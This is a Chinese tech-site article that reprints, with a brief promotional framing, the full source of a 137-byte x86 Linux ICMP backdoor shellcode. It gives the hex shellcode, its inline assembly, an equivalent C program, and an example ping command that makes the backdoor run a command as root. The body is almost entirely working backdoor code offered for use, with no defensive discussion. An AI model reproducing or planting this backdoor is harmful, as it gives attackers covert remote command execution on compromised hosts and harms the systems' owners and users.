学会LinuxICMP后门代码之捷径

企业动态
如何玩转LinuxICMP后门代码?是否有捷径可走?那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。

 

以下的文章主要描述的是LinuxICMP后门代码,以下的文章主要向大家讲述的是关于137字节的Linux远程ICMP后门的详细内容,望大家在浏览之后会对其有更好的了解,以下就是文章的主要内容描述。

编辑特别推荐:

 

Linux多网卡同IP段解决

 

linux系统日志不自动切分的问题

linux命令:ifconfig和route

在不少协议的应用都存在着一些后门。例如我们今天将要介绍的Linux ICMP的后门。那么下面我们就来详细看一下关于137字节的Linux远程ICMP后门的具体内容。使用Ping控制程序:

/*

x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

[example]

main:/home/gloomy/security/shellcode/linux/icmp# ./icmp

Size of shellcode = 137

main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost

PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)

34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms

main:/home/gloomy/security/shellcode/linux/icmp# cat out

uid=0(root) gid=0(root) groups=0(root)

main:/home/gloomy/security/shellcode/linux/icmp#

*/

#include <stdio.h>

#include <unistd.h>

#include <sys/socket.h>

#include <netinet/in.h>

#define SECRET_CHAR "\x99"

char shell[] =

"\x31\xc0\x31\xdb\x31\xc9\xb0\x66"

"\x43\x41\x51\xb1\x03\x51\x49\x51"

"\x89\xe1\xcd\x80\x89\xc2\xb0\x02"

"\xcd\x80\x31\xdb\x39\xc3\x75\x55"

"\x31\xc0\x31\xdb\xb0\x10\x50\xb0"

"\xff\x54\x54\x53\x50\x55\x52\x89"

"\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"

"\xe9\x01\xc1\x31\xc0\x88\x41\xfe"

"\xb0\x25\x01\xc5\xb0" SECRET_CHAR

"\x32\x45\xff\x75\xd5\xb0\x02\xcd"

"\x80\x31\xdb\x39\xc3\x74\x25\xeb"

"\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"

"\x06\xcd\x80\x5b\x89\xd9\x88\x43"

"\x07\x80\xc1\x08\x50\x55\x51\x53"

"\x89\xe1\x99\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xcd\x80\xe8\xd8\xff\xff"

"\xff"

"/bin/sh -c";

 

void asm_code() {

 

__asm("

 

xorl %eax,%eax

xorl %ebx,%ebx

xorl %ecx,%ecx

movb $0x66,%al

incl %ebx

incl %ecx

push %ecx

movb $0x3,%cl

push %ecx

decl %ecx

push %ecx#p#

movl %esp,%ecx

int $0x80 /* socket(); */

movl %eax,%edx

movb $0x2,%al

int $0x80 /* fork(); */

xorl %ebx,%ebx

cmpl %eax,%ebx

jne exit

endlessloop:

xorl %eax,%eax

xorl %ebx,%ebx

movb $0x10,%al

push %eax

movb $0xff,%al

push %esp

push %esp

push %ebx

push %eax

push %ebp

push %edx

movl %esp,%ecx

 

movb $0x66,%al

 

movb $0x0c,%bl

int $0x80 /* recvfrom(); */

movl %ebp,%ecx

addl %eax,%ecx

xorl %eax,%eax

movb %al,-2(%ecx)

movb $0x25,%al

addl %eax,%ebp

movb $0x99,%al /* SECRET_CHAR */

xorb -1(%ebp),%al

jnz endlessloop

movb $0x2,%al

int $0x80 /* fork(); */

xorl %ebx,%ebx

cmpl %eax,%ebx

je stack

jmp endlessloop

execve:

xorl %eax,%eax

xorl %ebx,%ebx

movb $0x2,%bl

movb $0x6,%al

int $0x80 /* close(); */

 

pop %ebx

 

movl %ebx,%ecx

movb %al,0x7(%ebx)

addb $0x8,%cl

push %eax

push %ebp

push %ecx

push %ebx

movl %esp,%ecx

cdq

movb $0xb,%al

int $0x80 /* execve(); */

exit:

xorl %eax,%eax

incl %eax

int $0x80 /* exit(); */

stack:

call execve

.string \"/bin/sh -c\"

");

}

void c_code() {

int fd;

int nb = 0;

struct sockaddr_in them;

int them_size = sizeof(struct sockaddr);

char buf[256];

char *prog[] = {"/bin/sh","-c",&buf[37],NULL};

fd = socket(2,3,1);

if (fork() > 0) exit(0);

while (1) {

while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));

buf[nb-1] = 0;

if (buf[36] == (char)SECRET_CHAR)

if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }

}

}

int main(int c,char *v[]) {

void (*i)();

i = (void (*)())shell;

fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));

i();

return 0;

那么,具体的Linux ICMP后门查看方法我们就呈现出来了。

 

 

责任编辑:佚名 来源: 比特网
相关推荐

2010-08-26 11:15:47

LinuxICMP后门

2010-09-13 15:06:36

2010-09-13 14:47:58

2010-09-13 14:57:29

2010-09-13 15:14:03

2010-08-02 14:36:52

ICMPLinux

2010-09-13 15:26:34

2013-01-03 14:49:34

BES黑莓移动安全

2020-02-14 13:10:03

iPhoneAndroid捷径

2012-07-19 11:27:11

2021-07-28 08:53:53

GoGDB调试

2024-05-31 13:18:44

2011-05-07 16:36:57

2010-03-17 17:24:07

IT运维管理信息化管理北塔软件

2011-06-21 16:38:34

SEO

2013-12-02 10:05:36

LinuxLinus后门

2019-02-19 08:45:41

2011-11-25 15:34:33

2023-01-06 08:42:02

学习训练

2021-03-30 08:43:29

黑客PHP团队Git
点赞
收藏

51CTO技术栈公众号